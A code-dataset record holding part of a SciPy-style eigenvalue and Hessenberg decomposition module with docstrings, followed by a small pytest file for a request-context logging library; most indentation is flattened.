If omitted, identity matrix is assumed.
lower : bool, optional
Whether the pertinent array data is taken from the lower or upper
triangle of `a`. (Default: lower)
eigvals_only : bool, optional
Whether to calculate only eigenvalues and no eigenvectors.
(Default: both are calculated)
turbo : bool, optional
Use divide and conquer algorithm (faster but expensive in memory,
only for generalized eigenvalue problem and if eigvals=None)
eigvals : tuple (lo, hi), optional
Indexes of the smallest and largest (in ascending order) eigenvalues
and corresponding eigenvectors to be returned: 0 <= lo <= hi <= M-1.
If omitted, all eigenvalues and eigenvectors are returned.
type : int, optional
Specifies the problem type to be solved:
type = 1: a v[:,i] = w[i] b v[:,i]
type = 2: a b v[:,i] = w[i] v[:,i]
type = 3: b a v[:,i] = w[i] v[:,i]
overwrite_a : bool, optional
Whether to overwrite data in `a` (may improve performance)
overwrite_b : bool, optional
Whether to overwrite data in `b` (may improve performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
w : (N,) float ndarray
The N (1<=N<=M) selected eigenvalues, in ascending order, each
repeated according to its multiplicity.
v : (M, N) complex ndarray
(if eigvals_only == False)
The normalized selected eigenvector corresponding to the
eigenvalue w[i] is the column v[:,i].
Normalization:
type 1 and 3: v.conj() a v = w
type 2: inv(v).conj() a inv(v) = w
type = 1 or 2: v.conj() b v = I
type = 3: v.conj() inv(b) v = I
Raises
------
LinAlgError
If eigenvalue computation does not converge,
        an error occurred, or the b matrix is not positive definite. Note that
if input matrices are not symmetric or hermitian, no error is reported
but results will be wrong.
See Also
--------
eigvalsh : eigenvalues of symmetric or Hermitian arrays
eig : eigenvalues and right eigenvectors for non-symmetric arrays
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
    eigh_tridiagonal : eigenvalues and right eigenvectors for
symmetric/Hermitian tridiagonal matrices
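    Examples
    --------
    A minimal illustrative sketch (this 2x2 symmetric matrix has eigenvalues
    1 and 3, returned in ascending order):
    >>> import numpy as np
    >>> from scipy.linalg import eigh
    >>> a = np.array([[2., 1.], [1., 2.]])
    >>> w, v = eigh(a)
    >>> np.allclose(w, [1., 3.])
    True
    >>> np.allclose(a.dot(v), v * w)
    True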
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or (_datacopied(a1, a))
if iscomplexobj(a1):
cplx = True
else:
cplx = False
if b is not None:
b1 = _asarray_validated(b, check_finite=check_finite)
overwrite_b = overwrite_b or _datacopied(b1, b)
if len(b1.shape) != 2 or b1.shape[0] != b1.shape[1]:
raise ValueError('expected square matrix')
if b1.shape != a1.shape:
raise ValueError("wrong b dimensions %s, should "
"be %s" % (str(b1.shape), str(a1.shape)))
if iscomplexobj(b1):
cplx = True
else:
cplx = cplx or False
else:
b1 = None
# Set job for fortran routines
_job = (eigvals_only and 'N') or 'V'
# port eigenvalue range from python to fortran convention
if eigvals is not None:
lo, hi = eigvals
if lo < 0 or hi >= a1.shape[0]:
raise ValueError('The eigenvalue range specified is not valid.\n'
'Valid range is [%s,%s]' % (0, a1.shape[0]-1))
lo += 1
hi += 1
eigvals = (lo, hi)
# set lower
if lower:
uplo = 'L'
else:
uplo = 'U'
# fix prefix for lapack routines
if cplx:
pfx = 'he'
else:
pfx = 'sy'
# Standard Eigenvalue Problem
# Use '*evr' routines
# FIXME: implement calculation of optimal lwork
# for all lapack routines
if b1 is None:
driver = pfx+'evr'
(evr,) = get_lapack_funcs((driver,), (a1,))
if eigvals is None:
w, v, info = evr(a1, uplo=uplo, jobz=_job, range="A", il=1,
iu=a1.shape[0], overwrite_a=overwrite_a)
else:
(lo, hi) = eigvals
w_tot, v, info = evr(a1, uplo=uplo, jobz=_job, range="I",
il=lo, iu=hi, overwrite_a=overwrite_a)
w = w_tot[0:hi-lo+1]
# Generalized Eigenvalue Problem
else:
# Use '*gvx' routines if range is specified
if eigvals is not None:
driver = pfx+'gvx'
(gvx,) = get_lapack_funcs((driver,), (a1, b1))
(lo, hi) = eigvals
w_tot, v, ifail, info = gvx(a1, b1, uplo=uplo, iu=hi,
itype=type, jobz=_job, il=lo,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
w = w_tot[0:hi-lo+1]
# Use '*gvd' routine if turbo is on and no eigvals are specified
elif turbo:
driver = pfx+'gvd'
(gvd,) = get_lapack_funcs((driver,), (a1, b1))
v, w, info = gvd(a1, b1, uplo=uplo, itype=type, jobz=_job,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
# Use '*gv' routine if turbo is off and no eigvals are specified
else:
driver = pfx+'gv'
(gv,) = get_lapack_funcs((driver,), (a1, b1))
v, w, info = gv(a1, b1, uplo=uplo, itype=type, jobz=_job,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
# Check if we had a successful exit
if info == 0:
if eigvals_only:
return w
else:
return w, v
_check_info(info, driver, positive=False) # triage more specifically
if info > 0 and b1 is None:
raise LinAlgError("unrecoverable internal error.")
# The algorithm failed to converge.
elif 0 < info <= b1.shape[0]:
if eigvals is not None:
raise LinAlgError("the eigenvectors %s failed to"
" converge." % nonzero(ifail)-1)
else:
raise LinAlgError("internal fortran routine failed to converge: "
"%i off-diagonal elements of an "
"intermediate tridiagonal form did not converge"
" to zero." % info)
# This occurs when b is not positive definite
else:
raise LinAlgError("the leading minor of order %i"
" of 'b' is not positive definite. The"
" factorization of 'b' could not be completed"
" and no eigenvalues or eigenvectors were"
" computed." % (info-b1.shape[0]))
_conv_dict = {0: 0, 1: 1, 2: 2,
'all': 0, 'value': 1, 'index': 2,
'a': 0, 'v': 1, 'i': 2}
def _check_select(select, select_range, max_ev, max_len):
"""Check that select is valid, convert to Fortran style."""
if isinstance(select, string_types):
select = select.lower()
try:
select = _conv_dict[select]
except KeyError:
raise ValueError('invalid argument for select')
vl, vu = 0., 1.
il = iu = 1
if select != 0: # (non-all)
sr = asarray(select_range)
if sr.ndim != 1 or sr.size != 2 or sr[1] < sr[0]:
raise ValueError('select_range must be a 2-element array-like '
'in nondecreasing order')
if select == 1: # (value)
vl, vu = sr
if max_ev == 0:
max_ev = max_len
else: # 2 (index)
if sr.dtype.char.lower() not in 'lih':
raise ValueError('when using select="i", select_range must '
'contain integers, got dtype %s' % sr.dtype)
# translate Python (0 ... N-1) into Fortran (1 ... N) with + 1
il, iu = sr + 1
if min(il, iu) < 1 or max(il, iu) > max_len:
raise ValueError('select_range out of bounds')
max_ev = iu - il + 1
return select, vl, vu, il, iu, max_ev
def eig_banded(a_band, lower=False, eigvals_only=False, overwrite_a_band=False,
select='a', select_range=None, max_ev=0, check_finite=True):
"""
Solve real symmetric or complex hermitian band matrix eigenvalue problem.
Find eigenvalues w and optionally right eigenvectors v of a::
a v[:,i] = w[i] v[:,i]
v.H v = identity
The matrix a is stored in a_band either in lower diagonal or upper
diagonal ordered form:
a_band[u + i - j, j] == a[i,j] (if upper form; i <= j)
a_band[ i - j, j] == a[i,j] (if lower form; i >= j)
where u is the number of bands above the diagonal.
Example of a_band (shape of a is (6,6), u=2)::
upper form:
* * a02 a13 a24 a35
* a01 a12 a23 a34 a45
a00 a11 a22 a33 a44 a55
lower form:
a00 a11 a22 a33 a44 a55
a10 a21 a32 a43 a54 *
a20 a31 a42 a53 * *
Cells marked with * are not used.
Parameters
----------
a_band : (u+1, M) array_like
The bands of the M by M matrix a.
lower : bool, optional
Is the matrix in the lower form. (Default is upper form)
eigvals_only : bool, optional
Compute only the eigenvalues and no eigenvectors.
(Default: calculate also eigenvectors)
overwrite_a_band : bool, optional
Discard data in a_band (may enhance performance)
select : {'a', 'v', 'i'}, optional
Which eigenvalues to calculate
====== ========================================
select calculated
====== ========================================
'a' All eigenvalues
'v' Eigenvalues in the interval (min, max]
'i' Eigenvalues with indices min <= i <= max
====== ========================================
select_range : (min, max), optional
Range of selected eigenvalues
max_ev : int, optional
For select=='v', maximum number of eigenvalues expected.
For other values of select, has no meaning.
In doubt, leave this parameter untouched.
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
w : (M,) ndarray
The eigenvalues, in ascending order, each repeated according to its
multiplicity.
v : (M, M) float or complex ndarray
The normalized eigenvector corresponding to the eigenvalue w[i] is
the column v[:,i].
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
eigvals_banded : eigenvalues for symmetric/Hermitian band matrices
eig : eigenvalues and right eigenvectors of general arrays.
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
    eigh_tridiagonal : eigenvalues and right eigenvectors for
symmetric/Hermitian tridiagonal matrices
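    Examples
    --------
    A minimal illustrative sketch for a 4x4 symmetric tridiagonal matrix with
    2 on the diagonal and 1 on the first off-diagonal, stored in upper band
    form (u=1; the unused leading ``*`` cell of the top row is set to 0):
    >>> import numpy as np
    >>> from scipy.linalg import eig_banded
    >>> a_band = np.array([[0., 1., 1., 1.],
    ...                    [2., 2., 2., 2.]])
    >>> w, v = eig_banded(a_band)
    >>> a = np.diag(np.ones(3), 1) + 2 * np.eye(4) + np.diag(np.ones(3), -1)
    >>> np.allclose(a.dot(v), v * w)
    True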
"""
if eigvals_only or overwrite_a_band:
a1 = _asarray_validated(a_band, check_finite=check_finite)
overwrite_a_band = overwrite_a_band or (_datacopied(a1, a_band))
else:
a1 = array(a_band)
if issubclass(a1.dtype.type, inexact) and not isfinite(a1).all():
raise ValueError("array must not contain infs or NaNs")
overwrite_a_band = 1
if len(a1.shape) != 2:
raise ValueError('expected two-dimensional array')
select, vl, vu, il, iu, max_ev = _check_select(
select, select_range, max_ev, a1.shape[1])
del select_range
if select == 0:
if a1.dtype.char in 'GFD':
# FIXME: implement this somewhen, for now go with builtin values
# FIXME: calc optimal lwork by calling ?hbevd(lwork=-1)
# or by using calc_lwork.f ???
# lwork = calc_lwork.hbevd(bevd.typecode, a1.shape[0], lower)
internal_name = 'hbevd'
else: # a1.dtype.char in 'fd':
# FIXME: implement this somewhen, for now go with builtin values
# see above
# lwork = calc_lwork.sbevd(bevd.typecode, a1.shape[0], lower)
internal_name = 'sbevd'
bevd, = get_lapack_funcs((internal_name,), (a1,))
w, v, info = bevd(a1, compute_v=not eigvals_only,
lower=lower, overwrite_ab=overwrite_a_band)
else: # select in [1, 2]
if eigvals_only:
max_ev = 1
# calculate optimal abstol for dsbevx (see manpage)
if a1.dtype.char in 'fF': # single precision
lamch, = get_lapack_funcs(('lamch',), (array(0, dtype='f'),))
else:
lamch, = get_lapack_funcs(('lamch',), (array(0, dtype='d'),))
abstol = 2 * lamch('s')
if a1.dtype.char in 'GFD':
internal_name = 'hbevx'
else: # a1.dtype.char in 'gfd'
internal_name = 'sbevx'
bevx, = get_lapack_funcs((internal_name,), (a1,))
w, v, m, ifail, info = bevx(
a1, vl, vu, il, iu, compute_v=not eigvals_only, mmax=max_ev,
range=select, lower=lower, overwrite_ab=overwrite_a_band,
abstol=abstol)
# crop off w and v
w = w[:m]
if not eigvals_only:
v = v[:, :m]
_check_info(info, internal_name)
if eigvals_only:
return w
return w, v
def eigvals(a, b=None, overwrite_a=False, check_finite=True,
homogeneous_eigvals=False):
"""
Compute eigenvalues from an ordinary or generalized eigenvalue problem.
Find eigenvalues of a general matrix::
a vr[:,i] = w[i] b vr[:,i]
Parameters
----------
a : (M, M) array_like
A complex or real matrix whose eigenvalues and eigenvectors
will be computed.
b : (M, M) array_like, optional
Right-hand side matrix in a generalized eigenvalue problem.
If omitted, identity matrix is assumed.
overwrite_a : bool, optional
Whether to overwrite data in a (may improve performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities
or NaNs.
homogeneous_eigvals : bool, optional
If True, return the eigenvalues in homogeneous coordinates.
In this case ``w`` is a (2, M) array so that::
w[1,i] a vr[:,i] = w[0,i] b vr[:,i]
Default is False.
Returns
-------
w : (M,) or (2, M) double or complex ndarray
The eigenvalues, each repeated according to its multiplicity
but not in any specific order. The shape is (M,) unless
``homogeneous_eigvals=True``.
Raises
------
LinAlgError
If eigenvalue computation does not converge
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays.
eigvalsh : eigenvalues of symmetric or Hermitian arrays
eigvals_banded : eigenvalues for symmetric/Hermitian band matrices
eigvalsh_tridiagonal : eigenvalues of symmetric/Hermitian tridiagonal
matrices
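    Examples
    --------
    A minimal illustrative sketch (for a triangular matrix the eigenvalues
    are its diagonal entries; they are returned in no particular order, so
    sort before comparing):
    >>> import numpy as np
    >>> from scipy.linalg import eigvals
    >>> a = np.array([[1., 2.], [0., 3.]])
    >>> np.allclose(np.sort_complex(eigvals(a)), [1., 3.])
    True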
"""
return eig(a, b=b, left=0, right=0, overwrite_a=overwrite_a,
check_finite=check_finite,
homogeneous_eigvals=homogeneous_eigvals)
def eigvalsh(a, b=None, lower=True, overwrite_a=False,
overwrite_b=False, turbo=True, eigvals=None, type=1,
check_finite=True):
"""
Solve an ordinary or generalized eigenvalue problem for a complex
Hermitian or real symmetric matrix.
Find eigenvalues w of matrix a, where b is positive definite::
a v[:,i] = w[i] b v[:,i]
v[i,:].conj() a v[:,i] = w[i]
v[i,:].conj() b v[:,i] = 1
Parameters
----------
a : (M, M) array_like
A complex Hermitian or real symmetric matrix whose eigenvalues and
eigenvectors will be computed.
b : (M, M) array_like, optional
        A complex Hermitian or real symmetric positive definite matrix.
If omitted, identity matrix is assumed.
lower : bool, optional
Whether the pertinent array data is taken from the lower or upper
triangle of `a`. (Default: lower)
turbo : bool, optional
Use divide and conquer algorithm (faster but expensive in memory,
only for generalized eigenvalue problem and if eigvals=None)
eigvals : tuple (lo, hi), optional
Indexes of the smallest and largest (in ascending order) eigenvalues
and corresponding eigenvectors to be returned: 0 <= lo < hi <= M-1.
If omitted, all eigenvalues and eigenvectors are returned.
type : int, optional
Specifies the problem type to be solved:
type = 1: a v[:,i] = w[i] b v[:,i]
type = 2: a b v[:,i] = w[i] v[:,i]
type = 3: b a v[:,i] = w[i] v[:,i]
overwrite_a : bool, optional
Whether to overwrite data in `a` (may improve performance)
overwrite_b : bool, optional
Whether to overwrite data in `b` (may improve performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
w : (N,) float ndarray
The N (1<=N<=M) selected eigenvalues, in ascending order, each
repeated according to its multiplicity.
Raises
------
LinAlgError
If eigenvalue computation does not converge,
        an error occurred, or the b matrix is not positive definite. Note that
if input matrices are not symmetric or hermitian, no error is reported
but results will be wrong.
See Also
--------
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
eigvals : eigenvalues of general arrays
eigvals_banded : eigenvalues for symmetric/Hermitian band matrices
eigvalsh_tridiagonal : eigenvalues of symmetric/Hermitian tridiagonal
matrices
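    Examples
    --------
    A minimal illustrative sketch (the same 2x2 symmetric matrix as in `eigh`;
    eigenvalues 1 and 3 are returned in ascending order):
    >>> import numpy as np
    >>> from scipy.linalg import eigvalsh
    >>> a = np.array([[2., 1.], [1., 2.]])
    >>> np.allclose(eigvalsh(a), [1., 3.])
    True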
"""
return eigh(a, b=b, lower=lower, eigvals_only=True,
overwrite_a=overwrite_a, overwrite_b=overwrite_b,
turbo=turbo, eigvals=eigvals, type=type,
check_finite=check_finite)
def eigvals_banded(a_band, lower=False, overwrite_a_band=False,
select='a', select_range=None, check_finite=True):
"""
Solve real symmetric or complex hermitian band matrix eigenvalue problem.
Find eigenvalues w of a::
a v[:,i] = w[i] v[:,i]
v.H v = identity
The matrix a is stored in a_band either in lower diagonal or upper
diagonal ordered form:
a_band[u + i - j, j] == a[i,j] (if upper form; i <= j)
a_band[ i - j, j] == a[i,j] (if lower form; i >= j)
where u is the number of bands above the diagonal.
Example of a_band (shape of a is (6,6), u=2)::
upper form:
* * a02 a13 a24 a35
* a01 a12 a23 a34 a45
a00 a11 a22 a33 a44 a55
lower form:
a00 a11 a22 a33 a44 a55
a10 a21 a32 a43 a54 *
a20 a31 a42 a53 * *
Cells marked with * are not used.
Parameters
----------
a_band : (u+1, M) array_like
The bands of the M by M matrix a.
lower : bool, optional
Is the matrix in the lower form. (Default is upper form)
overwrite_a_band : bool, optional
Discard data in a_band (may enhance performance)
select : {'a', 'v', 'i'}, optional
Which eigenvalues to calculate
====== ========================================
select calculated
====== ========================================
'a' All eigenvalues
'v' Eigenvalues in the interval (min, max]
'i' Eigenvalues with indices min <= i <= max
====== ========================================
select_range : (min, max), optional
Range of selected eigenvalues
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
w : (M,) ndarray
The eigenvalues, in ascending order, each repeated according to its
multiplicity.
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
eig_banded : eigenvalues and right eigenvectors for symmetric/Hermitian
band matrices
eigvalsh_tridiagonal : eigenvalues of symmetric/Hermitian tridiagonal
matrices
eigvals : eigenvalues of general arrays
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
eig : eigenvalues and right eigenvectors for non-symmetric arrays
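    Examples
    --------
    A minimal illustrative sketch using the same 4x4 tridiagonal band matrix
    as in `eig_banded` (checked against the dense computation):
    >>> import numpy as np
    >>> from scipy.linalg import eigvals_banded
    >>> a_band = np.array([[0., 1., 1., 1.],
    ...                    [2., 2., 2., 2.]])
    >>> w = eigvals_banded(a_band)
    >>> a = np.diag(np.ones(3), 1) + 2 * np.eye(4) + np.diag(np.ones(3), -1)
    >>> np.allclose(w, np.linalg.eigvalsh(a))
    True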
"""
return eig_banded(a_band, lower=lower, eigvals_only=1,
overwrite_a_band=overwrite_a_band, select=select,
select_range=select_range, check_finite=check_finite)
def eigvalsh_tridiagonal(d, e, select='a', select_range=None,
check_finite=True, tol=0., lapack_driver='auto'):
"""
Solve eigenvalue problem for a real symmetric tridiagonal matrix.
Find eigenvalues `w` of ``a``::
a v[:,i] = w[i] v[:,i]
v.H v = identity
For a real symmetric matrix ``a`` with diagonal elements `d` and
off-diagonal elements `e`.
Parameters
----------
d : ndarray, shape (ndim,)
The diagonal elements of the array.
e : ndarray, shape (ndim-1,)
The off-diagonal elements of the array.
select : {'a', 'v', 'i'}, optional
Which eigenvalues to calculate
====== ========================================
select calculated
====== ========================================
'a' All eigenvalues
'v' Eigenvalues in the interval (min, max]
'i' Eigenvalues with indices min <= i <= max
====== ========================================
select_range : (min, max), optional
Range of selected eigenvalues
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
tol : float
The absolute tolerance to which each eigenvalue is required
(only used when ``lapack_driver='stebz'``).
An eigenvalue (or cluster) is considered to have converged if it
lies in an interval of this width. If <= 0. (default),
the value ``eps*|a|`` is used where eps is the machine precision,
and ``|a|`` is the 1-norm of the matrix ``a``.
lapack_driver : str
LAPACK function to use, can be 'auto', 'stemr', 'stebz', 'sterf',
or 'stev'. When 'auto' (default), it will use 'stemr' if ``select='a'``
and 'stebz' otherwise. 'sterf' and 'stev' can only be used when
``select='a'``.
Returns
-------
w : (M,) ndarray
The eigenvalues, in ascending order, each repeated according to its
multiplicity.
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
    eigh_tridiagonal : eigenvalues and right eigenvectors for
symmetric/Hermitian tridiagonal matrices
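    Examples
    --------
    A minimal illustrative sketch (eigenvalues of a 4x4 tridiagonal matrix,
    checked against the dense computation):
    >>> import numpy as np
    >>> from scipy.linalg import eigvalsh_tridiagonal
    >>> d = np.array([2., 2., 2., 2.])
    >>> e = np.array([1., 1., 1.])
    >>> w = eigvalsh_tridiagonal(d, e)
    >>> a = np.diag(d) + np.diag(e, 1) + np.diag(e, -1)
    >>> np.allclose(w, np.linalg.eigvalsh(a))
    True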
"""
return eigh_tridiagonal(
d, e, eigvals_only=True, select=select, select_range=select_range,
check_finite=check_finite, tol=tol, lapack_driver=lapack_driver)
def eigh_tridiagonal(d, e, eigvals_only=False, select='a', select_range=None,
check_finite=True, tol=0., lapack_driver='auto'):
"""
Solve eigenvalue problem for a real symmetric tridiagonal matrix.
Find eigenvalues `w` and optionally right eigenvectors `v` of ``a``::
a v[:,i] = w[i] v[:,i]
v.H v = identity
For a real symmetric matrix ``a`` with diagonal elements `d` and
off-diagonal elements `e`.
Parameters
----------
d : ndarray, shape (ndim,)
The diagonal elements of the array.
e : ndarray, shape (ndim-1,)
The off-diagonal elements of the array.
select : {'a', 'v', 'i'}, optional
Which eigenvalues to calculate
====== ========================================
select calculated
====== ========================================
'a' All eigenvalues
'v' Eigenvalues in the interval (min, max]
'i' Eigenvalues with indices min <= i <= max
====== ========================================
select_range : (min, max), optional
Range of selected eigenvalues
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
tol : float
The absolute tolerance to which each eigenvalue is required
(only used when 'stebz' is the `lapack_driver`).
An eigenvalue (or cluster) is considered to have converged if it
lies in an interval of this width. If <= 0. (default),
the value ``eps*|a|`` is used where eps is the machine precision,
and ``|a|`` is the 1-norm of the matrix ``a``.
lapack_driver : str
LAPACK function to use, can be 'auto', 'stemr', 'stebz', 'sterf',
or 'stev'. When 'auto' (default), it will use 'stemr' if ``select='a'``
and 'stebz' otherwise. When 'stebz' is used to find the eigenvalues and
``eigvals_only=False``, then a second LAPACK call (to ``?STEIN``) is
used to find the corresponding eigenvectors. 'sterf' can only be
used when ``eigvals_only=True`` and ``select='a'``. 'stev' can only
be used when ``select='a'``.
Returns
-------
w : (M,) ndarray
The eigenvalues, in ascending order, each repeated according to its
multiplicity.
v : (M, M) ndarray
The normalized eigenvector corresponding to the eigenvalue ``w[i]`` is
the column ``v[:,i]``.
Raises
------
LinAlgError
If eigenvalue computation does not converge.
See Also
--------
eigvalsh_tridiagonal : eigenvalues of symmetric/Hermitian tridiagonal
matrices
eig : eigenvalues and right eigenvectors for non-symmetric arrays
eigh : eigenvalues and right eigenvectors for symmetric/Hermitian arrays
eig_banded : eigenvalues and right eigenvectors for symmetric/Hermitian
band matrices
Notes
-----
This function makes use of LAPACK ``S/DSTEMR`` routines.
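    Examples
    --------
    A minimal illustrative sketch (the eigenpairs satisfy ``a v = v w`` for
    the dense matrix built from ``d`` and ``e``):
    >>> import numpy as np
    >>> from scipy.linalg import eigh_tridiagonal
    >>> d = np.array([2., 2., 2., 2.])
    >>> e = np.array([1., 1., 1.])
    >>> w, v = eigh_tridiagonal(d, e)
    >>> a = np.diag(d) + np.diag(e, 1) + np.diag(e, -1)
    >>> np.allclose(a.dot(v), v * w)
    True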
"""
d = _asarray_validated(d, check_finite=check_finite)
e = _asarray_validated(e, check_finite=check_finite)
for check in (d, e):
if check.ndim != 1:
raise ValueError('expected one-dimensional array')
if check.dtype.char in 'GFD': # complex
raise TypeError('Only real arrays currently supported')
if d.size != e.size + 1:
raise ValueError('d (%s) must have one more element than e (%s)'
% (d.size, e.size))
select, vl, vu, il, iu, _ = _check_select(
select, select_range, 0, d.size)
if not isinstance(lapack_driver, string_types):
raise TypeError('lapack_driver must be str')
drivers = ('auto', 'stemr', 'sterf', 'stebz', 'stev')
if lapack_driver not in drivers:
raise ValueError('lapack_driver must be one of %s, got %s'
% (drivers, lapack_driver))
if lapack_driver == 'auto':
lapack_driver = 'stemr' if select == 0 else 'stebz'
func, = get_lapack_funcs((lapack_driver,), (d, e))
compute_v = not eigvals_only
if lapack_driver == 'sterf':
if select != 0:
raise ValueError('sterf can only be used when select == "a"')
if not eigvals_only:
raise ValueError('sterf can only be used when eigvals_only is '
'True')
w, info = func(d, e)
m = len(w)
elif lapack_driver == 'stev':
if select != 0:
raise ValueError('stev can only be used when select == "a"')
w, v, info = func(d, e, compute_v=compute_v)
m = len(w)
elif lapack_driver == 'stebz':
tol = float(tol)
internal_name = 'stebz'
stebz, = get_lapack_funcs((internal_name,), (d, e))
# If getting eigenvectors, needs to be block-ordered (B) instead of
        # matrix-ordered (E), and we will reorder later
order = 'E' if eigvals_only else 'B'
m, w, iblock, isplit, info = stebz(d, e, select, vl, vu, il, iu, tol,
order)
else: # 'stemr'
# ?STEMR annoyingly requires size N instead of N-1
e_ = empty(e.size+1, e.dtype)
e_[:-1] = e
stemr_lwork, = get_lapack_funcs(('stemr_lwork',), (d, e))
lwork, liwork, info = stemr_lwork(d, e_, select, vl, vu, il, iu,
compute_v=compute_v)
_check_info(info, 'stemr_lwork')
m, w, v, info = func(d, e_, select, vl, vu, il, iu,
compute_v=compute_v, lwork=lwork, liwork=liwork)
_check_info(info, lapack_driver + ' (eigh_tridiagonal)')
w = w[:m]
if eigvals_only:
return w
else:
        # Do we still need to compute the eigenvectors?
if lapack_driver == 'stebz':
func, = get_lapack_funcs(('stein',), (d, e))
v, info = func(d, e, w, iblock, isplit)
_check_info(info, 'stein (eigh_tridiagonal)',
positive='%d eigenvectors failed to converge')
# Convert block-order to matrix-order
order = argsort(w)
w, v = w[order], v[:, order]
else:
v = v[:, :m]
return w, v
def _check_info(info, driver, positive='did not converge (LAPACK info=%d)'):
"""Check info return value."""
if info < 0:
raise ValueError('illegal value in argument %d of internal %s'
% (-info, driver))
if info > 0 and positive:
raise LinAlgError(("%s " + positive) % (driver, info,))
def hessenberg(a, calc_q=False, overwrite_a=False, check_finite=True):
"""
Compute Hessenberg form of a matrix.
The Hessenberg decomposition is::
A = Q H Q^H
where `Q` is unitary/orthogonal and `H` has only zero elements below
the first sub-diagonal.
Parameters
----------
a : (M, M) array_like
Matrix to bring into Hessenberg form.
calc_q : bool, optional
Whether to compute the transformation matrix. Default is False.
overwrite_a : bool, optional
Whether to overwrite `a`; may improve performance.
Default is False.
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
H : (M, M) ndarray
Hessenberg form of `a`.
Q : (M, M) ndarray
Unitary/orthogonal similarity transformation matrix ``A = Q H Q^H``.
Only returned if ``calc_q=True``.
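    Examples
    --------
    A minimal illustrative sketch checking the defining property
    ``A = Q H Q^H`` and the zero pattern below the first sub-diagonal:
    >>> import numpy as np
    >>> from scipy.linalg import hessenberg
    >>> a = np.array([[2., 1., 3.], [4., 0., 1.], [5., 2., 2.]])
    >>> h, q = hessenberg(a, calc_q=True)
    >>> np.allclose(q.dot(h).dot(q.conj().T), a)
    True
    >>> np.allclose(np.tril(h, -2), 0)
    True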
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or (a1.shape[0] != a1.shape[1]):
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or (_datacopied(a1, a))
# if 2x2 or smaller: already in Hessenberg
if a1.shape[0] <= 2:
if calc_q:
return a1, numpy.eye(a1.shape[0])
return a1
gehrd, gebal, gehrd_lwork = get_lapack_funcs(('gehrd', 'gebal',
'gehrd_lwork'), (a1,))
ba, lo, hi, pivscale, info = gebal(a1, permute=0, overwrite_a=overwrite_a)
_check_info(info, 'gebal (hessenberg)', positive=False)
n = len(a1)
lwork = _compute_lwork(gehrd_lwork, ba.shape[0], lo=lo, hi=hi)
hq, tau, info = gehrd(ba, lo=lo, hi=hi, lwork=lwork, overwrite_a=1)
_check_info(info, 'gehrd (hessenberg)', positive=False)
h = numpy.triu(hq, -1)
if not calc_q:
return h
# use orghr/unghr to compute q
orghr, orghr_lwork = get_lapack_funcs(('orghr', 'orghr_lwork'), (a1,))
lwork = _compute_lwork(orghr_lwork, n, lo=lo, hi=hi)
q, info = orghr(a=hq, tau=tau, lo=lo, hi=hi, lwork=lwork, overwrite_a=1)
_check_info(info, 'orghr (hessenberg)', positive=False)
return h, q
| mit |
mila/kudzu | tests/test_logging.py | 1 | 2718 |
from __future__ import absolute_import
import logging
from werkzeug.test import EnvironBuilder
from kudzu import RequestContext, kudzify_handler, kudzify_logger
class HandlerMock(logging.Handler):
"""Logging handler which saves all logged messages."""
def __init__(self):
logging.Handler.__init__(self)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
class TestRequestContextFilter(object):
format = '["%(method)s %(proto)s %(uri)s" from %(addr)s] %(message)s'
def setup_method(self, method):
self.handler = HandlerMock()
self.logger = logging.getLogger('test_logging')
self.logger.addHandler(self.handler)
self.logger.level = logging.DEBUG
def teardown_method(self, method):
self.logger.removeHandler(self.handler)
def test_kudzify_handler(self):
kudzify_handler(self.handler, format=self.format)
builder = EnvironBuilder()
with RequestContext(builder.get_environ()):
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
assert self.handler.messages[0] == \
'["GET HTTP/1.1 /" from -] Hello Kudzu'
def test_kudzify_logger(self):
kudzify_logger(self.logger, format=self.format)
builder = EnvironBuilder()
with RequestContext(builder.get_environ()):
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
assert self.handler.messages[0] == \
'["GET HTTP/1.1 /" from -] Hello Kudzu'
def test_kudzify_logger_by_name(self):
kudzify_logger(self.logger.name, format=self.format)
builder = EnvironBuilder()
with RequestContext(builder.get_environ()):
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
assert self.handler.messages[0] == \
'["GET HTTP/1.1 /" from -] Hello Kudzu'
def test_log_wo_context(self):
kudzify_logger(self.logger, format=self.format)
self.logger.info('Hello %s', 'Kudzu')
assert len(self.handler.messages) == 1
